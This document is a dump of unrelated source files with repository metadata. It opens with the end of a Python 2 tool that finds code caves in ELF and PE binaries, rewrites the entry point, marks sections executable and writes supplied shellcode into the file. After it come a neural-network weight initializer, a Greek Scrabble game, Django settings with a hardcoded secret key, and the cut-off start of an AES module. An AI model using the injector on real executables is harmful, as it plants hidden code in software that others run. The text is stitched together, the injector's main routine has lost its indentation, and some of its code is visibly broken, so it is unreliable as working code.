            string1 = "%s|%s [ %s] %s%s %s%s %s%s %s%s %s|" % (bcolors.HEADER,bcolors.FAIL, "{:<5}".format(y), bcolors.HEADER, "{:<18}".format(section['name']), bcolors.OKGREEN, "{:<18}".format(section['type']), bcolors.LB, "{:<18}".format(section['sh_addr']), bcolors.OKBLUE, "{:<18}".format(section['sh_offset']), bcolors.HEADER )
            string2 = "%s|%s %s %s%s %s%s %s%s |" % (bcolors.HEADER,bcolors.PR,"{:<18}".format(section['sh_size']), bcolors.WARNING, "{:<18}".format(section['sh_entsize']), bcolors.FAIL, "{:<18}".format(section['parsed_flags']), bcolors.HEADER, "{:<18}".format(section['sh_addralign']))
            print string1
            print string2
            print divisor
    elif btype == "PE":
        # PE layout: name/size/vsize/location, then data ptr/reloc ptr/flags/characteristics.
        print "%s| %s[Number] %s%s %s%s %s%s %s%s%s |" % (bcolors.HEADER, bcolors.FAIL, bcolors.HEADER, "{:<18}".format('Name'),bcolors.OKGREEN, "{:<18}".format('Size'), bcolors.LB, "{:<18}".format('Virtual Size'), bcolors.OKBLUE,"{:<18}".format('Location'),bcolors.HEADER )
        print "%s| %s%s %s%s %s%s %s%s |" % (bcolors.HEADER,bcolors.PR,"{:<18}".format('Data Pointer'),bcolors.WARNING, "{:<18}".format('Reloc Pointer'),bcolors.FAIL, "{:<18}".format('Flags'),bcolors.HEADER,"{:<18}".format('Characteristics') )
        print divisor
        for x in range(0,len(sections)):
            section = sections[x]
            # Zero-pad single-digit hex indices so "0x5" renders as "0x05".
            y = hex(x)
            if len(y) < 4:
                y = "0x0" + y[-1]
            string1 = "%s|%s [ %s] %s%s %s0x%s %s0x%s %s0x%s %s|" % (bcolors.HEADER,bcolors.FAIL, "{:<5}".format(y), bcolors.HEADER, "{:<18}".format(section['sh_name']), bcolors.OKGREEN, "{:<16}".format(section['sh_size']), bcolors.LB, "{:<16}".format(section['sh_vsize']), bcolors.OKBLUE, "{:<16}".format(section['sh_addr']), bcolors.HEADER )
            string2 = "%s|%s 0x%s %s0x%s %s%s %s0x%s |" % (bcolors.HEADER,bcolors.PR,"{:<16}".format(section['sh_dataPointer']), bcolors.WARNING, "{:<16}".format(section['sh_relocPointer']), bcolors.FAIL, "{:<18}".format(section['parsed_flags']), bcolors.HEADER, "{:<16}".format(section['sh_characteristics']))
            print string1
            print string2
            print divisor
def crawlSection(o, s, fl, name, path, length, enumerating):
    """Scan `s` bytes of `path`, starting at file offset `o`, for code caves.

    A "cave" is a run of consecutive null bytes at least `length` bytes long.
    Returns a list of dicts with keys 'Starting Offset', 'Length', 'Flags'
    and 'Name' (the owning section's flags/name, passed in as `fl`/`name`),
    or the integer 0 when no qualifying cave exists.  `enumerating` is
    accepted for interface compatibility but unused.
    """
    # Bug fix: the file handle was previously never closed.
    with io.open(path, 'rb') as f:
        f.seek(o)
        b = f.read(s)
    cave_arr = []
    cave_offset = ""
    cave_length = 0
    counting = False

    def check_cave(run_length, min_length):
        # A run only qualifies once it reaches the requested minimum size.
        return run_length >= int(min_length)

    def record_cave():
        cave_arr.append({
            "Starting Offset": cave_offset,
            "Length": cave_length,
            "Flags": fl,
            "Name": name,
        })

    for i, rbyte in enumerate(b):
        # Iterating bytes yields ints on Python 3 and 1-char strings on
        # Python 2; normalize to an int so both interpreters work.
        value = rbyte if isinstance(rbyte, int) else ord(rbyte)
        at_end = (i == len(b) - 1)
        if value == 0:
            if not counting:
                # First null byte of a potential cave.  Bug fix: this byte
                # was previously counted twice (the old code fell through
                # both the "start" and "increment" branches).
                cave_offset = i + o
                cave_length = 1
                counting = True
            else:
                cave_length += 1
            # Buffer ends inside a run: flush it if long enough.
            if at_end and check_cave(cave_length, length):
                record_cave()
        else:
            if counting:
                # Run just ended: record it if long enough, then reset.
                if check_cave(cave_length, length):
                    record_cave()
                cave_offset = ""
                cave_length = 0
                counting = False
    if len(cave_arr) > 0:
        return cave_arr
    return 0
def print_caves(arr):
    # Pretty-print every discovered cave: owning section, start/end offsets,
    # byte length and the section's permission flags.
    # NOTE: Python 2 `print` statements; relies on module-level `bcolors`
    # (ANSI color constants) and `sstr` (string padding/coloring helper).
    for x in range(0,len(arr)):
        cave = arr[x]
        notification = "" + bcolors.HEADER
        notification += "+----------------------------------------+\n"
        notification += "| Cave Located! |\n"
        notification += sstr("Section: %s " % cave['Name'], bcolors.HEADER) + '\n'
        notification += sstr("Starting offset: %s " % hex(cave['Starting Offset']), bcolors.OKGREEN)+ '\n'
        # End offset is derived, not stored: start + length.
        notification += sstr("Ending offset: %s " % hex(int(cave['Starting Offset']) + int(cave['Length'])), bcolors.OKGREEN)+ '\n'
        notification += sstr("Cave length: %s bytes" % cave['Length'], bcolors.WARNING ) + '\n'
        notification += sstr("Flags: %s " % cave['Flags'], bcolors.FAIL) + '\n'
        notification += "+----------------------------------------+" + '\n'
        print notification
def setPermission(path, ftype, secName, sections):
    # Overwrite the flags field of the named section header on disk so the
    # section becomes writable/allocated/executable.  Only implemented for
    # ELF targets; PE targets fall through silently.
    if ftype == "ELF":
        for section in sections:
            if section['name'] == secName:
                # 'soffset' is the file offset of this section's header entry.
                o = section['soffset']
                cp = io.open(path,'r+b')
                # Seek past sh_name/sh_type to the flags field — presumably
                # the sh_flags member of a 64-bit Elf64_Shdr (offset 8);
                # TODO confirm this tool only handles 64-bit ELF here.
                cp.seek(int(o)+8)
                flgint = section['sh_flags']
                # NOTE(review): fflg and lflg are computed but never used.
                fflg = flgint[0:-1]
                lflg = 4 + int(flgint[-1])
                # Little-endian 8-byte value 0x7 — presumably
                # SHF_WRITE|SHF_ALLOC|SHF_EXECINSTR; verify against the ELF spec.
                flg = "0700000000000000"
                cp.write(bytearray.fromhex(flg))
                cp.close()
                print "Flags successfully reset."
def main():
global args
global results
path = results.file_path
if path == '':
path = raw_input("Input path to the file to look for code caves in\n> ")
fh = results.fh
ftype = getFileType(path)
sh = results.sh
se = results.search
sAX = results.allEx
sA = results.allSec
ccByte = results.byte
caveLen = results.length
p = results.permissions
if p == True:
sA == True
enumerating = False
injecting = False
e = ['-S', '--search', '-X', '-A', '-l', '--length', '-b', '--byte']
for flag in e:
if flag in args:
enumerating = True
i = ['-t', '--target-offset', '-j', '-J', '-o', '--output-file']
for flag in i:
if flag in args:
injecting = True
if (len(args)==1 or (len(args)==3 and path != '')):
enumerating = True
fh = True
sh = True
sA = True
EH = parseExecHeader(ftype, path,fh)
if (results.autoentry == True):
epoint = results.target
elif(results.epoints):
epoint = results.epoints
else:
epoint = None
if(epoint):
if(len(epoint) % 2 == 1):
epoint = str(0) + epoint
print "New entry point: 0x%s" % epoint
earr = []
while epoint:
earr.append(epoint[:2])
epoint = epoint[2:]
bz = io.open(path,'r+b')
if(EH['format'] == 'ELF'):
bz.seek(24)
# take offset string, format for writing to binary
if(EH['endian'] == 'Little'):
earr = earr[::-1]
if(EH['arch']=="64-bit"):
while(len(earr)<8):
earr.append("00")
else:
while(len(earr)<4):
earr.append("00")
elif(EH['endian'] == 'Big'):
if(EH['arch']=="64-bit"):
while(len(earr)<8):
earr.insert(0,"00")
else:
while(len(earr)<4):
earr.insert(0,"00")
epoint = ''.join(earr)
bz.write(bytearray.fromhex(epoint))
bz.close()
crawled = []
if ftype == "ELF":
sections = elfs(path, EH['sht'], EH['arch'], EH['endian'], EH['e_shnum'], EH['e_shentsize'], EH['e_shstrndx'], sh)
if sh:
sectionsOverView(sections, ftype)
for sec in sections:
if sA:
c = crawlSection(int(sec['sh_offset'],16), int(sec['sh_size'],16), sec['parsed_flags'], sec['name'], path, caveLen,enumerating)
if c:
for e in c:
crawled.append(e)
elif (int(sec['sh_flags']) & 0b100) and sAX == True:
c = crawlSection(int(sec['sh_offset'],16), int(sec['sh_size'],16), sec['parsed_flags'], sec['name'], path, caveLen,enumerating)
if c:
for e in c:
crawled.append(e)
elif se and sec['name'] == se:
c = crawlSection(int(sec['sh_offset'],16), int(sec['sh_size'],16), sec['parsed_flags'], sec['name'], path, caveLen,enumerating)
if c:
for e in c:
crawled.append(e)
elif ftype == "PE":
sections = pes(path,EH['sht'],EH['endian'],EH['e_shnum'],EH['e_shentsize'],sh)
if sh:
sectionsOverView(sections,ftype)
for sec in sections:
if sA:
c = crawlSection(int(sec['sh_dataPointer'],16), int(sec['sh_size'],16), sec['parsed_flags'], sec['sh_name'], path, caveLen, enumerating)
if c:
for e in c:
crawled.append(e)
elif (int(sec['sh_characteristics'],16) & 0x20000000) and sAX == True:
c = crawlSection(int(sec['sh_dataPointer'],16), int(sec['sh_size'],16), sec['parsed_flags'], sec['sh_name'], path, caveLen,enumerating)
if c:
for e in c:
crawled.append(e)
elif se and sec['name'] == se:
c = crawlSection(int(sec['sh_dataPointer'],16), int(sec['sh_size'],16), sec['parsed_flags'], sec['sh_name'], path, caveLen, enumerating)
if c:
for e in c:
crawled.append(e)
if enumerating == True:
print bcolors.OKBLUE + "Done crawling for caves: Found %s" % len(crawled)
if (len(crawled) > 0) and (enumerating == True):
print_caves(crawled)
if injecting == True:
binShell = None
if results.injection_file:
binS = io.open(results.injection_file,'rb')
binS.read()
binShell = bytearray.fromhex(binS)
elif results.injection_string:
ijstr = results.injection_string
ijstr = ijstr.lower()
ijstr = ''.join(ijstr.split('x'))
binShell = bytearray.fromhex(ijstr)
if binShell == None:
print "Error: Need -j or -J flag to supply shellcode to inject"
sys.exit(0)
tgt = results.target
if tgt == None:
print "Error: Need -t flag to point to target offset (in hex)"
sys.exit(0)
else:
target_offset = int(tgt,16)
if p == True:
shelLen = len(binShell)
print "Identifying code cave in offset %s..." % hex(target_offset)
for cave in crawled:
start = int(cave['Starting Offset'])
end = start + int(cave['Length'])
if start <= target_offset <= (end-shelLen):
print "Cave fits! Cave at offset %s is %s bytes long and the shellcode is only %s bytes.\nChecking permissions..." % (hex(start), cave['Length'], shelLen)
print "Permissions: %s" % cave['Flags']
if 'X' in cave['Flags']:
print "Target section already marked executable!"
else:
print "Setting section flag to executable..."
setPermission(path, ftype, cave['Name'], sections)
print "Writing shellcode (%s bytes) to offset 0x%s" % (len(binShell), tgt)
bd = io.open(path,'r+b')
bd.seek(target_offset)
bd.write(binShell)
bd.close()
print "Shellcode written!"
main()
| [
"noreply@github.com"
] | noreply@github.com |
bfa55ad689dbd194e7a2ccacb5e42fbbe87d0ebb | 44c4e4d97b42aba9732b8297528e9a9da48e9d5a | /metal/utils/weight_inits.py | eaa3948e24fa880011a9ceafd1b90979fc6a7cd3 | [] | no_license | miguelmyers8/Metal | a5d3355a39f6fbe496cb88d936c573f196ee410b | 79edb4656babd076036fc841c184fc75721f055a | refs/heads/master | 2021-06-03T03:43:15.959493 | 2020-08-19T01:17:17 | 2020-08-19T01:17:17 | 145,047,788 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,197 | py | import numpy as _np
from metal.autograd import numpy as np
def calc_fan(weight_shape):
    """Return ``(fan_in, fan_out)`` for a weight matrix/volume.

    The final two entries of `weight_shape` must be ``(in_ch, out_ch)``;
    for 3D/4D kernels the leading two (spatial) dimensions multiply into
    both fan values.  Raises ``ValueError`` on other ranks.
    """
    rank = len(weight_shape)
    if rank == 2:
        return weight_shape[0], weight_shape[1]
    if rank in (3, 4):
        in_ch, out_ch = weight_shape[2:]
        receptive_field = _np.prod(weight_shape[:2])
        return in_ch * receptive_field, out_ch * receptive_field
    raise ValueError("Unrecognized weight dimension: {}".format(weight_shape))
def he_uniform(weight_shape):
    """He-uniform weight initialization.

    Draws from ``Uniform(-b, b)`` with ``b = sqrt(6 / fan_in)``; developed
    for deep networks with ReLU nonlinearities.

    Parameters
    ----------
    weight_shape : tuple
        The dimensions of the weight matrix/volume.

    Returns
    -------
    W : :py:class:`ndarray <numpy.ndarray>` of shape `weight_shape`
        The initialized weights.
    """
    fan_in, _ = calc_fan(weight_shape)
    bound = np.sqrt(6 / fan_in)
    return _np.random.uniform(-bound, bound, size=weight_shape)
def he_normal(weight_shape):
    """He-normal weight initialization.

    Draws from ``TruncatedNormal(0, b)`` with variance ``b = 2 / fan_in``;
    originally developed for deep networks with ReLU nonlinearities.

    Parameters
    ----------
    weight_shape : tuple
        The dimensions of the weight matrix/volume.

    Returns
    -------
    W : :py:class:`ndarray <numpy.ndarray>` of shape `weight_shape`
        The initialized weights.
    """
    fan_in, _ = calc_fan(weight_shape)
    scale = np.sqrt(2 / fan_in)
    return truncated_normal(0, scale, weight_shape)
def glorot_uniform(weight_shape, gain=1.0):
    """Glorot (Xavier) uniform weight initialization.

    Draws from ``Uniform(-b, b)`` with
    ``b = gain * sqrt(6 / (fan_in + fan_out))``, chosen so the variance of a
    layer's outputs approximately matches that of its inputs.  Primarily
    intended for deep networks with tanh / logistic-sigmoid nonlinearities.

    Parameters
    ----------
    weight_shape : tuple
        The dimensions of the weight matrix/volume.
    gain : float
        Multiplicative scale on the uniform bound. Default is 1.0.

    Returns
    -------
    W : :py:class:`ndarray <numpy.ndarray>` of shape `weight_shape`
        The initialized weights.
    """
    fan_in, fan_out = calc_fan(weight_shape)
    limit = gain * _np.sqrt(6 / (fan_in + fan_out))
    return _np.random.uniform(-limit, limit, size=weight_shape)
def glorot_normal(weight_shape, gain=1.0):
    """Glorot (Xavier) normal weight initialization.

    Draws from ``TruncatedNormal(0, b)`` with variance
    ``b = 2 * gain**2 / (fan_in + fan_out)``, chosen so the variance of a
    layer's outputs approximately matches that of its inputs.  Primarily
    intended for deep networks with tanh / sigmoid nonlinearities.

    Parameters
    ----------
    weight_shape : tuple
        The dimensions of the weight matrix/volume.
    gain : float
        Multiplicative scale on the standard deviation. Default is 1.0.

    Returns
    -------
    W : :py:class:`ndarray <numpy.ndarray>` of shape `weight_shape`
        The initialized weights.
    """
    fan_in, fan_out = calc_fan(weight_shape)
    scale = gain * np.sqrt(2 / (fan_in + fan_out))
    return truncated_normal(0, scale, weight_shape)
def truncated_normal(mean, std, out_shape):
    """Draw from ``Normal(mean, std)`` truncated to two standard deviations.

    Uses rejection sampling: any draw at or beyond ``mean ± 2*std`` is
    redrawn until every sample lies strictly inside the band.

    Parameters
    ----------
    mean : float or array_like of floats
        The mean/center of the distribution.
    std : float or array_like of floats
        Standard deviation (spread) of the distribution.
    out_shape : int or tuple of ints
        Output shape of the sample array.

    Returns
    -------
    samples : :py:class:`ndarray <numpy.ndarray>` of shape `out_shape`
        Samples from the truncated normal distribution.
    """
    draws = _np.random.normal(loc=mean, scale=std, size=out_shape)
    out_of_band = np.logical_or(draws >= mean + 2 * std, draws <= mean - 2 * std)
    while any(out_of_band.flatten()):
        # Redraw only the rejected positions and re-check the whole array.
        draws[out_of_band] = _np.random.normal(loc=mean, scale=std, size=out_of_band.sum())
        out_of_band = np.logical_or(draws >= mean + 2 * std, draws <= mean - 2 * std)
    return draws
| [
"miguelmyers8@gmail.com"
] | miguelmyers8@gmail.com |
bdb306b3e562b04342c57acd93039423c834095d | 4879b2fb1c92552d9286bdd3ff37ecaa42cc04c0 | /Other/Scrabble/mylib.py | fe0b1987a7ec462b0f4b55a18337c9664238bf00 | [] | no_license | propol/University_Projects | 302bd069acbd68528834ae4632a25dceb646bf96 | 094205a42f5b61d931322cbda18e6a4eb51e361e | refs/heads/master | 2020-06-01T21:57:24.393554 | 2019-07-05T22:04:43 | 2019-07-05T22:04:43 | 94,086,704 | 0 | 1 | null | 2019-04-24T08:08:46 | 2017-06-12T11:03:09 | C++ | UTF-8 | Python | false | false | 2,955 | py | import random
import codecs
from itertools import permutations
# Word -> total-score dictionary; populated from greek7.txt by makeFile().
lexiko = {}
# Scrabble point value of each Greek capital letter.
points = {'Α': 1, 'Β': 8, 'Γ': 4, 'Δ': 4, 'Ε': 1, 'Ζ': 10, 'Η': 1, 'Θ': 10, 'Ι': 1, 'Κ': 2, 'Λ': 3, 'Μ': 3,
          'Ν': 1, 'Ξ': 10, 'Ο': 1, 'Π': 2, 'Ρ': 2, 'Σ': 1, 'Τ': 1, 'Υ': 2, 'Φ': 8, 'Χ': 8, 'Ψ': 10, 'Ω': 3}
class SakClass:
    """The bag of Scrabble tiles: tracks how many of each letter remain."""

    def __init__(self):
        # 102 tiles in total, distributed over the 24 Greek letters
        # (index order follows the alphabet, final sigma excluded).
        self.letters = 102
        self.lettersList = [12, 1, 2, 2, 8, 1, 7, 1, 8, 4, 3, 3, 6, 1, 9, 4, 5, 7, 8, 4, 1, 1, 1, 3]

    def randomLetters(self, n):
        """Draw `n` random tiles from the bag.

        Returns a list of single-entry ``{letter: point_value}`` dicts and
        decrements the bag's counters accordingly.
        """
        drawn = []
        for _ in range(n):
            idx = random.randint(0, 23)
            # Redraw until we hit a letter that is still in the bag.
            while self.lettersList[idx] == 0:
                idx = random.randint(0, 23)
            # Indices >= 17 are shifted by one code point — presumably to
            # skip the unused slot between Ρ and Σ in the Unicode block.
            offset = idx + 1 if idx >= 17 else idx
            letter = chr(ord('Α') + offset)
            drawn.append({letter: points[letter]})
            self.letters -= 1
            self.lettersList[idx] -= 1
        return drawn
class Player:
    """A human player: display name, running score, and current rack."""

    def __init__(self, name):
        self.name = name
        self.score = 0
        # Rack of {letter: points} dicts, filled from the tile bag.
        self.playerLetters = []
class PcPlayer:
    """Computer player with three word-picking strategies over its rack.

    All strategies permute the rack letters and look candidates up in the
    module-level `lexiko` dictionary; each returns 'q' when nothing plays.
    """

    def __init__(self):
        self.score = 0
        self.playerLetters = []

    def minLetters(self):
        """Return the first playable word, trying shortest lengths first."""
        rack = ''.join(list(tile.keys())[0] for tile in self.playerLetters)
        for size in range(2, 7):
            for candidate in (''.join(p) for p in permutations(rack, size)):
                if candidate in lexiko:
                    return candidate
        return 'q'

    def maxLetters(self):
        """Return the first playable word, trying longest lengths first."""
        rack = ''.join(list(tile.keys())[0] for tile in self.playerLetters)
        for size in range(7, 2, -1):
            for candidate in (''.join(p) for p in permutations(rack, size)):
                if candidate in lexiko.keys():
                    return candidate
        return 'q'

    def smart(self):
        """Return the highest-scoring playable word across all lengths."""
        rack = ''.join(list(tile.keys())[0] for tile in self.playerLetters)
        best_word = ''
        best_score = 0
        for size in range(2, 7):
            for candidate in (''.join(p) for p in permutations(rack, size)):
                if candidate in lexiko.keys() and lexiko[candidate] > best_score:
                    best_word = candidate
                    best_score = lexiko[candidate]
        return best_word if best_word != '' else 'q'
def makeFile():
    """Load greek7.txt and fill the module-level `lexiko` word->score dict.

    Each line is scored as the sum of the `points` values of its letters
    (newline excluded); the trailing character of the line is stripped to
    form the dictionary key.
    """
    with codecs.open('greek7.txt', 'r', encoding='utf8') as wordfile:
        for line in wordfile:
            word_score = sum(points[ch] for ch in line if ch != '\n')
            lexiko[line[:-1]] = word_score
| [
"noreply@github.com"
] | noreply@github.com |
4a32f8e3968cc9c9bb8b355411d8be8b5926f1d6 | 4c97f83aa598655c78c94f5085a39fb75359e4e9 | /quickstart/quickstart/settings.py | 4be3763f15d6ec88687cba5663c0630d2315b840 | [
"MIT"
] | permissive | PedroBern/django-graphql-auth | 7b7a90a52cb3aaf6dbc9e42dda2b6c1bf9fa8c73 | face76be02928947e32358c5207b397d2457f99b | refs/heads/master | 2023-08-17T00:45:53.384463 | 2022-06-17T09:46:13 | 2022-06-17T09:46:13 | 234,124,856 | 342 | 123 | MIT | 2023-08-14T18:47:29 | 2020-01-15T16:36:01 | Python | UTF-8 | Python | false | false | 4,182 | py | """
Django settings for quickstart project.
Generated by 'django-admin startproject' using Django 3.0.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = "ut$psxte+5)8q@lyd!8+y*_hbg)vgpwh8aj@lo=4w7d!*217rj"
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    "django.contrib.admin",
    "django.contrib.auth",
    "django.contrib.contenttypes",
    "django.contrib.sessions",
    "django.contrib.messages",
    "django.contrib.staticfiles",
    "users",
    "graphene_django",
    "graphql_jwt.refresh_token.apps.RefreshTokenConfig",
    "graphql_auth",
    "django_filters",
]
MIDDLEWARE = [
    "django.middleware.security.SecurityMiddleware",
    "django.contrib.sessions.middleware.SessionMiddleware",
    "django.middleware.common.CommonMiddleware",
    "django.middleware.csrf.CsrfViewMiddleware",
    "django.contrib.auth.middleware.AuthenticationMiddleware",
    "django.contrib.messages.middleware.MessageMiddleware",
    "django.middleware.clickjacking.XFrameOptionsMiddleware",
]
ROOT_URLCONF = "quickstart.urls"
TEMPLATES = [
    {
        "BACKEND": "django.template.backends.django.DjangoTemplates",
        "DIRS": [],
        "APP_DIRS": True,
        "OPTIONS": {
            "context_processors": [
                "django.template.context_processors.debug",
                "django.template.context_processors.request",
                "django.contrib.auth.context_processors.auth",
                "django.contrib.messages.context_processors.messages",
            ]
        },
    }
]
WSGI_APPLICATION = "quickstart.wsgi.application"
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
    "default": {
        "ENGINE": "django.db.backends.sqlite3",
        "NAME": os.path.join(BASE_DIR, "db.sqlite3"),
    }
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        "NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator"
    },
    {"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator"},
    {"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator"},
    {"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator"},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = "en-us"
TIME_ZONE = "UTC"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = "/static/"
# graphene-django configuration: schema location plus JWT auth middleware.
GRAPHENE = {
    "SCHEMA": "quickstart.schema.schema",
    "MIDDLEWARE": ["graphql_jwt.middleware.JSONWebTokenMiddleware"],
}
# Backends are tried in order: GraphQLAuthBackend first, then Django's default.
AUTHENTICATION_BACKENDS = [
    "graphql_auth.backends.GraphQLAuthBackend",
    "django.contrib.auth.backends.ModelBackend",
]
# JWT settings: expiring tokens with long-running refresh tokens, and the
# graphql_auth mutations that must stay reachable without authentication
# (registration, activation, password reset, token management).
GRAPHQL_JWT = {
    "JWT_VERIFY_EXPIRATION": True,
    "JWT_LONG_RUNNING_REFRESH_TOKEN": True,
    "JWT_ALLOW_ANY_CLASSES": [
        "graphql_auth.mutations.Register",
        "graphql_auth.mutations.VerifyAccount",
        "graphql_auth.mutations.ResendActivationEmail",
        "graphql_auth.mutations.SendPasswordResetEmail",
        "graphql_auth.mutations.PasswordReset",
        "graphql_auth.mutations.ObtainJSONWebToken",
        "graphql_auth.mutations.VerifyToken",
        "graphql_auth.mutations.RefreshToken",
        "graphql_auth.mutations.RevokeToken",
        "graphql_auth.mutations.VerifySecondaryEmail",
    ],
}
# Print outgoing e-mail to the console (development only).
EMAIL_BACKEND = "django.core.mail.backends.console.EmailBackend"
# Project-defined user model replaces django.contrib.auth's default.
AUTH_USER_MODEL = "users.CustomUser"
| [
"pedrobermoreira@gmail.com"
] | pedrobermoreira@gmail.com |
6d594e11da8a7b220ea7286f7fb5b4a2a98c0b15 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/16/usersdata/78/6015/submittedfiles/triangulo.py | 8f53086208c10d248c43bc38a441462edf00389a | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 427 | py | # -*- coding: utf-8 -*-
from __future__ import division
import math
a=input('digite o valor de a:')
b=input('digite o valor de b:')
c=input('digite o valor de c:')
if a>=b>=c>0:
print('s')
if a>b+c:
print('n')
if a**2==(b**2)+(c**2):
print('Re')
if a**2>(b**2)+(c**2):
print('Ob')
if a**2<(b**2)+(c**2):
print('Ac')
if a==b==c:
print('Eq')
if b==c!=a:
print('Is')
if a!=b!=c:
print('Es')
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
2095f914ce3e96225e455108732ef0798ef5a742 | 241703a2ca81bcc2b08084bf5ea2fe7415bcbfc6 | /Tasks/Chernikova/5.py | 05385ca5a3dd0ced7af41c54184ea34aad7d277f | [] | no_license | PolinaChepolina/testRepo | 58a41df5ce88b98e5ff36ab0745d7694a4c57ce1 | 467888b8f7b7578d015ca5282929f4f119ac469b | refs/heads/master | 2020-05-23T18:03:20.899621 | 2019-08-04T10:56:47 | 2019-08-04T10:56:47 | 186,879,773 | 0 | 0 | null | 2019-07-12T21:36:49 | 2019-05-15T18:11:18 | null | UTF-8 | Python | false | false | 379 | py | Python 3.7.4 (v3.7.4:e09359112e, Jul 8 2019, 14:36:03)
[GCC 4.2.1 (Apple Inc. build 5666) (dot 3)] on darwin
Type "help", "copyright", "credits" or "license()" for more information.
>>>
=============================== RESTART: Shell ===============================
>>> a= int(input())
b = int(input())
l= int(input())
N = int(input())
print( (N-1)*2*b + a*(2*(N-1) +1) + 2*l)
| [
"p.chernikova@yandex.ru"
] | p.chernikova@yandex.ru |
26662c1be78015bae5c1bac4ae4b837575802df0 | 2368f31ff2b537aeba3f0fdddd13b02cc409ad96 | /aes.py | 3ead499c32ec34972368894b1c9d0a5b8980c584 | [] | no_license | balayette/fault | 163c53bdb00560194da16df1becaba309e88fce3 | 2cd0b262b58ab574a179fe015094fd7fb77af0fe | refs/heads/main | 2023-02-21T15:47:35.129674 | 2021-01-20T00:15:32 | 2021-01-20T00:15:32 | 321,193,709 | 17 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,874 | py | #!/usr/bin/env python3
import random
"""
This is an exercise in secure symmetric-key encryption, implemented in pure
Python (no external libraries needed).
Original AES-128 implementation by Bo Zhu (http://about.bozhu.me) at
https://github.com/bozhu/AES-Python . PKCS#7 padding, CBC mode, PKBDF2, HMAC,
byte array and string support added by me at https://github.com/boppreh/aes.
Other block modes contributed by @righthandabacus.
Although this is an exercise, the `encrypt` and `decrypt` functions should
provide reasonable security to encrypted messages.
"""
# AES forward S-box: the SubBytes substitution table, indexed by byte value.
s_box = (
    0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, 0x30, 0x01, 0x67, 0x2B, 0xFE, 0xD7, 0xAB, 0x76,
    0xCA, 0x82, 0xC9, 0x7D, 0xFA, 0x59, 0x47, 0xF0, 0xAD, 0xD4, 0xA2, 0xAF, 0x9C, 0xA4, 0x72, 0xC0,
    0xB7, 0xFD, 0x93, 0x26, 0x36, 0x3F, 0xF7, 0xCC, 0x34, 0xA5, 0xE5, 0xF1, 0x71, 0xD8, 0x31, 0x15,
    0x04, 0xC7, 0x23, 0xC3, 0x18, 0x96, 0x05, 0x9A, 0x07, 0x12, 0x80, 0xE2, 0xEB, 0x27, 0xB2, 0x75,
    0x09, 0x83, 0x2C, 0x1A, 0x1B, 0x6E, 0x5A, 0xA0, 0x52, 0x3B, 0xD6, 0xB3, 0x29, 0xE3, 0x2F, 0x84,
    0x53, 0xD1, 0x00, 0xED, 0x20, 0xFC, 0xB1, 0x5B, 0x6A, 0xCB, 0xBE, 0x39, 0x4A, 0x4C, 0x58, 0xCF,
    0xD0, 0xEF, 0xAA, 0xFB, 0x43, 0x4D, 0x33, 0x85, 0x45, 0xF9, 0x02, 0x7F, 0x50, 0x3C, 0x9F, 0xA8,
    0x51, 0xA3, 0x40, 0x8F, 0x92, 0x9D, 0x38, 0xF5, 0xBC, 0xB6, 0xDA, 0x21, 0x10, 0xFF, 0xF3, 0xD2,
    0xCD, 0x0C, 0x13, 0xEC, 0x5F, 0x97, 0x44, 0x17, 0xC4, 0xA7, 0x7E, 0x3D, 0x64, 0x5D, 0x19, 0x73,
    0x60, 0x81, 0x4F, 0xDC, 0x22, 0x2A, 0x90, 0x88, 0x46, 0xEE, 0xB8, 0x14, 0xDE, 0x5E, 0x0B, 0xDB,
    0xE0, 0x32, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x5C, 0xC2, 0xD3, 0xAC, 0x62, 0x91, 0x95, 0xE4, 0x79,
    0xE7, 0xC8, 0x37, 0x6D, 0x8D, 0xD5, 0x4E, 0xA9, 0x6C, 0x56, 0xF4, 0xEA, 0x65, 0x7A, 0xAE, 0x08,
    0xBA, 0x78, 0x25, 0x2E, 0x1C, 0xA6, 0xB4, 0xC6, 0xE8, 0xDD, 0x74, 0x1F, 0x4B, 0xBD, 0x8B, 0x8A,
    0x70, 0x3E, 0xB5, 0x66, 0x48, 0x03, 0xF6, 0x0E, 0x61, 0x35, 0x57, 0xB9, 0x86, 0xC1, 0x1D, 0x9E,
    0xE1, 0xF8, 0x98, 0x11, 0x69, 0xD9, 0x8E, 0x94, 0x9B, 0x1E, 0x87, 0xE9, 0xCE, 0x55, 0x28, 0xDF,
    0x8C, 0xA1, 0x89, 0x0D, 0xBF, 0xE6, 0x42, 0x68, 0x41, 0x99, 0x2D, 0x0F, 0xB0, 0x54, 0xBB, 0x16,
)
# Inverse S-box: used by InvSubBytes during decryption (inv_s_box[s_box[x]] == x).
inv_s_box = (
